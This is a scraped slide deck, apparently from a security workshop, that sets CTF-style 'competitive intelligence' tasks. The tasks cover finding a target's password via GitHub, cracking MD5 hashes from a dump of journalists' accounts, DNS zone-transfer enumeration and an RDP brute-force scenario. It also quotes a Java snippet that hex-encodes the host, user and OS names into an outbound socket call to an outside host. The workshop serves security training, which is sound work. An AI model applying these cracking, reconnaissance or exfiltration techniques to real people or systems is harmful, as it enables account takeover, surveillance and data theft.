Upload
nazar-tymoshyk
View
683
Download
0
Embed Size (px)
DESCRIPTION
Citation preview
Competitive Intelligence –
Competitor's Fatality
Igor Beliaiev
What is Competitive Intelligence(CI)?
Basic methods
Private data
Start is here: goo.gl/ygm51k
Інфо ебаут хак
The Workshop
Task #1. Intro
We know that Mikko Kuttonen is using github.
His github for working staff is mikkoKut1
You have to find his password for the home media server(107.170.*.*).
Task #2. Pakistani
There is a hacker from Pakistan. He is paid for hunting for a different journalists, that show how things in Ukraine are going on during the revolution.
We have some information about his last attacks, so we have to find out what he has done with his victims.
We have some dump with journalist's accounts on times.com. (times.zip)
Let's find any password, that he could hack. We know that only one of those accounts got hacked, so we have to find the easiest password.
Task #2. Pakistani
Hint! Journalist’s passwords are encrypted with MD5 algorithm
Hint! You can use MD5 online decoders
Task #3. Archive
As you can see, we also have another archive with file zik.doc, which we need, but it's encrypted.
We need to read the data from zikua.doc
Hint! Look carefully for the files in archives. Are there any common things?
Hint! You might also use some tools, which you have got with the tasks. But remember, you don’t have much time.
Task #4. Zik.ua
From the previous task we have got information, that there are some important files on torrent server on a*****.zik.ua
We need to find the subdomain and torrent server.
Hint! DNS-requests might help you
Hint! You can try to use AXFR-requests
$1mln/month
ValveSoftware.com
Task #5. Find the hacker
Finally we managed to find the real IP address of Pakistani hacker, and even bruteforce his RDP password.
We started to download his private files, but suddenly connection was lost...forever.
We managed to download only one file.
Using this file, find the name of the hacker!
Task #5. Find the hacker
Tasks from PHDays
Tasks from PHDays
Tasks from PHDays
Tasks from PHDaysString str1 = System.getProperty("os.name"); String str2 = System.getProperty("user.name"); InetAddress localInetAddress2 = InetAddress.getLocalHost(); InetAddress[] arrayOfInetAddress = InetAddress.getAllByName(localInetAddress2.getCanonicalHostName()); String str3 = arrayOfInetAddress[0].toString(); InetAddress localInetAddress1 = InetAddress.getLocalHost(); String str4 = localInetAddress1.getHostName(); String str5 = toHexString(str4.getBytes()) + toHexString("|".getBytes()) + toHexString(str2.getBytes()) + toHexString("|".getBytes()) + toHexString(str1.getBytes()); if (str5.length() > 63) { str5 = str5.substring(0, 63); } Socket localSocket = new Socket(str5 + paramString2, 80); String str6 = readAll(localSocket); String str7 = "access=true"; if (str6.contains(str7)) { localSocket = new Socket(paramString1 + "/loadsmb.cgi?host=" + str3 + "&file=/", 80);
Tasks from PHDays
+ WebRTC (net.ipcalf.com)
Tasks from PHDays
? ?